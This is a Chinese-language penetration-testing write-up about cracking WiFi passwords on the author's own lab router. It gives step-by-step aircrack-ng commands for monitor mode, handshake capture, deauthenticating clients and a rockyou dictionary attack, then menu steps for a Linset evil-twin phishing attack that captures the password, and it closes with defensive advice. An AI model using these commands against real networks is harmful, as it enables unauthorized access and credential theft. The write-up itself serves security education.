面向WiFi密码破解的渗透测试研究
前言:
WiFi使用现状:目前现代化的社会,WiFi的普及率很高,但人们的防范意识还是相当薄弱,许多家庭和公司的WiFi密码设置都为了方便仍然会使用弱口令,或者选择隐藏WiFi再使用弱口令。
对此,笔者针对隐藏WiFi使用弱口令的情况做了暴力破解的渗透实验。
另外,针对WiFi防范意识薄弱的情况做了WiFi钓鱼的渗透实验。
一、针对隐藏WiFi的弱口令密码爆破
使用系统:Kali Linux
使用工具:kali自带的aircrack-ng,RT3070L无线网卡
1、环境搭建
(1)路由器后台设置:
使用小米路由器搭建一个隐藏WiFi及设置弱口令密码。
(2)攻击系统安装:
Kali Linux系统虚拟机安装方法此处省略。
(3)接入无线网卡:
打开Kali Linux系统,插入无线网卡,确认已连接虚拟机设备。
iwconfig //查看当前网卡信息
出现wlan0等信息即表明网卡连接成功
2、WiFi探测
打开命令行终端,使用命令进行WiFi探测:
airmon-ng //查看网卡信息
airmon-ng start wlan0 //开启WiFi监听模式
iwconfig //查看本地网卡信息
可看到网卡已改名为wlan0mon,且处于监听模式
airodump-ng wlan0mon //扫描WiFi列表
其中,BSSID是路由器mac地址,CH为信道,ESSID为WiFi名称。
在ESSID字段中,有三个显示的是<length: >样式的,其实就是隐藏WiFi后被扫描出来的结果。
此处附近的WiFi中出现了三个隐藏WiFi,可通过逐个选中BSSID来针对性扫描即可发现哪个是目标WiFi。
airodump-ng -c 1 --bssid xx:xx:xx:xx:xx:xx -w /home/geek/Desktop/wifi/test wlan0mon
-c 指信道; --bssid 指bssid值; -w指握手包保存路径(test为握手包的名称)
//此时进入等待捕获握手包的窗口,右上角出现handshake字样即表示已捕获到抓手包。
//通过抓取握手包成功就发现了真正的ESSID值为WIFI-test。
3、攻击WiFi用户掉线
保留原握手包获取窗口,另开一个命令行终端窗口,执行命令进行攻击WiFi用户掉线
aireplay-ng -0 10 -a xx:xx:xx:xx:xx:xx -c xx:xx:xx:xx:xx:xx wlan0mon //攻击路线
-0 10 是指攻击10次(-0 0是指一直攻击无数次) -a是指bssid值 -c是指连接WiFi的用户mac地址
4、跑字典破解
等待握手包抓取成功后,可执行跑密码字典命令来破解WiFi密码。
由于该隐藏WiFi设置的是弱口令密码,因此这里使用kali自带的默认字典:
cd /usr/share/wordlists //进入字典所在目录
ls //可查看到有rockyou.txt.gz文件
sudo gunzip rockyou.txt.gz //解压缩字典
ls //可查看到解压后的字典文本
more rockyou.txt //查看字典文本文件
跑字典破解过程:
aircrack-ng -w rockyou.txt /home/geek/Desktop/wifi/test-01.cap
//命令格式:aircrack-ng -w 密码字典文件路径 握手包保存路径
实验结果:隐藏WiFi的弱口令密码被秒破,密码为:123456789
二、WiFi钓鱼
使用系统:wifislax中文版
使用工具:wifislax自带的linset,RT3070L无线网卡
1、环境搭建
(1)路由器后台设置:
使用小米路由器搭建一个正常开放且设置相对复杂的密码的WiFi。
(2)攻击系统安装:
wifislax中文版虚拟机安装方法:
1、使用VMware Workstation工具,版本不限,这里使用的是12PRO,此软件安装方法省略。
2、–>点击创建新的虚拟机
–>选择典型
–>下一步
3、–>选择稍后安装操作系统
–>下一步
4、–>选择Linux
–>选择Ubuntu 64 位
–>下一步
5、–>输入自定义名称
–>选择保存系统文件的路径
–>下一步
6、–>根据自己需求,正常保持默认即可
–>选择将虚拟磁盘拆分成多个文件
–>下一步
7、–>点击完成
8、–>点击编辑虚拟机设置
9、–>修改内存大小为4GB
9、–>点击CD/DVD (SATA)
–>选择使用ISO映像文件
–>选择ISO文件路径
–>确定
10、–>开启虚拟机 等待运行开机即可。
(3)接入无线网卡
打开wifislax系统,插入无线网卡,确认已连接虚拟机设备。
iwconfig //查看当前网卡信息
出现wlan0等信息即表明网卡连接成功
2、攻击过程
(1)打开Linset工具
点击左下角蓝色按钮,点击 >无线安全软件 >Wpa >Linset(Evil twin attack
(2)选择无线网卡
–>输入1
–>按回车键
(3)扫描与确定目标WiFi
–>输入1
–>回车键
–>进入扫描列表,等待出现目标WiFi后,用鼠标左键点击一下这个窗口任意处。
–>按Ctrl + C
–>输入要攻击的WiFi的编号,如这里是输入45
–>按回车键
(4)选择攻击模式
–>输入1
–>按回车键
–>按回车键
–>输入1
–>按回车键
–>输入1
–>按回车键
(5)抓包过程
右上角弹出WiFi握手包捕获窗口,等待捕获到握手包,如窗口中右上角方出现[WPA handshake: ]
即表示已捕获到握手包。
抓包成功,此时可用鼠标点击该握手包捕获的窗口任意处,按Ctrl +C可停止捕获握手包。
如原窗口出现黑屏现象,可点击窗口任意处,按回车键。
(8)执行攻击
–>输入1
–>按回车键
–>输入1
–>按回车键
–>输入1
–>按回车键
3、攻击效果
进入攻击界面,生成四个窗口,等待用户输入正确WiFi密码。
【用户视角】
用户连接上钓鱼热点后跳转的认证界面:
用户输入错误密码提交后的界面:
用户输入正确密码提交后的界面;
【攻击界面视角】
当用户输入正确的密码提交后,成功获取到WiFi密码:TobeFish@6666
三、防范建议
主要防范的思路:
1、提高密码复杂度,包含数字,英文大小写,符号。
2、在路由器后台关闭广播来隐藏WiFi,确实对普通用户效果还行,但同时也要设置复杂密码。
3、提高安全防钓鱼意识,不要在认证页面随意输入WiFi密码。
|